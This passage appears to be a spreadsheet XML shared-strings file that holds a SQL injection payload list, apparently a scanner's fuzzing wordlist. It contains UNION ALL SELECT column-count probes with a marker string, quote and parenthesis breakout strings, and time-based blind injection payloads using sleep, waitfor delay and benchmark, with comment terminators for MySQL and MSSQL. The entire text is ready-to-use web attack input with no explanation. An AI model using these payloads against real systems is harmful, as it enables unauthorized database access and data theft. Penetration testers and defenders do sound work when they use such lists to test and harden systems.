    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- </t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX'#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#</t>
  </si>
  <si>
    <t xml:space="preserve"> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#</t>
  </si>
  <si>
    <t>'</t>
  </si>
  <si>
    <t>"</t>
  </si>
  <si>
    <t>''</t>
  </si>
  <si>
    <t>'"</t>
  </si>
  <si>
    <t>;</t>
  </si>
  <si>
    <t xml:space="preserve"> ) </t>
  </si>
  <si>
    <t xml:space="preserve">' ) </t>
  </si>
  <si>
    <t xml:space="preserve">" ) </t>
  </si>
  <si>
    <t>" ) ;</t>
  </si>
  <si>
    <t>';</t>
  </si>
  <si>
    <t>";</t>
  </si>
  <si>
    <t>%'</t>
  </si>
  <si>
    <t>%"</t>
  </si>
  <si>
    <t xml:space="preserve">%' ) </t>
  </si>
  <si>
    <t xml:space="preserve">%" ) </t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )   ) </t>
  </si>
  <si>
    <t>sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>1 or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>" or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>' or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>" or sleep ( __TIME__ )  = "</t>
  </si>
  <si>
    <t>' or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
    <t>1 )  or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>" )  or sleep ( __TIME__ )  = "</t>
  </si>
  <si>
    <t>' )  or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
    <t>1  )  )   or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>"  )  )   or sleep ( __TIME__ )  = "</t>
  </si>
  <si>
    <t>'  )  )   or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
    <t>;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>';waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>";waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>' ) ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>" ) ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )  ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>'  )  )  ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>"  )  )  ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>1 or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>" or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>' or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>1 )  or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>" )  or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>' )  or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>1  )  )   or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>"  )  )   or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t>'  )  )   or benchmark ( 10000000,MD5 ( 1  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve"> )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>' )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>" )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>'  )  )   waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>"  )  )   waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>',NULL )  waifor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>',NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>",NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>",NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>' ) ,NULL )  waifor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>' ) ,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>" ) ,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>" ) ,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>',NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>',NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>",NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>",NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>',NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>',NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>",NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>",NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>',NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>',NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>",NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>",NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>',NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>',NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>",NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>",NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>',NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>',NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>",NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>",NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL,NULL,NULL,NULL,NULL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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t xml:space="preserve"> ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>' ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' /*</t>
  </si>
  <si>
    <t>" ) ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve"> waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t xml:space="preserve"> waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">' waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t>' waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">" waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t>" waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve"> )  waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )    )  )   waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t xml:space="preserve">  )  )    )  )   waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )    )  )   )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )    )  )    )  )   waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">' )  waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t xml:space="preserve">" )  waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )   waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )   waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )   )  waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t>'  )  )   )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )   )  waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t>"  )  )   )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )    )  )   waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t>'  )  )    )  )   waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )    )  )   waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t>"  )  )    )  )   waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )    )  )   )  waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t>'  )  )    )  )   )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )    )  )   )  waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t>"  )  )    )  )   )  waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">'  )  )    )  )    )  )   waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t>'  )  )    )  )    )  )   waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t xml:space="preserve">"  )  )    )  )    )  )   waitfor delay '0:0:20' /* </t>
  </si>
  <si>
    <t>"  )  )    )  )    )  )   waitfor delay '0:0:20' --</t>
  </si>
  <si>
    <t>+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   /*</t>
  </si>
  <si>
    <t>+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   --</t>
  </si>
  <si>
    <t>+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   %23</t>
  </si>
  <si>
    <t>'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   /*</t>
  </si>
  <si>
    <t>'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   --</t>
  </si>
  <si>
    <t>'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   %23</t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   /*</t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   --</t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL  )  )   %23</t>
  </si>
  <si>
    <t xml:space="preserve">+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  /* </t>
  </si>
  <si>
    <t>+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  --</t>
  </si>
  <si>
    <t>+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  %23</t>
  </si>
  <si>
    <t xml:space="preserve">'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  /* </t>
  </si>
  <si>
    <t>'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  --</t>
  </si>
  <si>
    <t>'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  %23</t>
  </si>
  <si>
    <t xml:space="preserve">"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  /* </t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  --</t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL )  %23</t>
  </si>
  <si>
    <t>+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL )  /*</t>
  </si>
  <si>
    <t>+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL )  --</t>
  </si>
  <si>
    <t>+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL )  %23</t>
  </si>
  <si>
    <t>'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL )  /*</t>
  </si>
  <si>
    <t>'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL )  --</t>
  </si>
  <si>
    <t>'+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL )  %23</t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL )  /*</t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL )  --</t>
  </si>
  <si>
    <t>"+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL )  %23</t>
  </si>
  <si>
    <t>+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL,NULL )  /*</t>
  </si>
  <si>
    <t>+if ( benchmark ( 3000000,MD5 ( 1  )  )  ,NULL,NULL ) ,NULL,NULL,NULL )  --</t>
  </si>
  <si>
